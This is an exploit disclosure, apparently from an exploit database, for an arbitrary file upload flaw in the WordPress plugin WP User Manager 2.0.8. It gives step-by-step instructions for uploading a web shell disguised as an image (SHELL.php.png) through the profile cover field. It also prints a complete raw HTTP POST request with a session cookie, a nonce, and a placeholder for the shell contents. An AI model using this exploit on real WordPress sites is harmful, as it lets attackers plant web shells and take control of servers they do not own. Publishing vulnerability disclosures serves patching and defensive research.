# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 5, 2019 # Vendor Homepage: https://wpusermanager.com # Software Link : https://wordpress.org/plugins/wp-user-manager/ # Tested Version: 2.0.8 # Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8 # Note: Free edition is vulnerable, other versions may also be affected. # PoC: # 1.- Login to site and go to your profile setting # 2.- In profile cover image section, you can upload your shell by adding image extensions to end of your shell. (ex: SHELL.php.png) # 3.- Click on "Update Profile" # You can see your shell in /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png # PoC header: POST /wordpress/?page_id=214&updated=success HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/?page_id=214&updated=success Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842 Content-Length: 2142 Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg" Content-Type: image/jpeg {{"SHELL CONTENT"}} -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_email" {{"Email"}} -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_firstname" -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_lastname" -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_nickname" root -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_displayname" display_nickname -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_website" -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="user_description" -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="wpum_form" profile -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="step" 0 -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="account_update_nonce" df63baa04c -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="_wp_http_referer" /wordpress/?page_id=214&updated=success -----------------------------1794372498243154061698264842 Content-Disposition: form-data; name="submit_account" Update profile -----------------------------1794372498243154061698264842--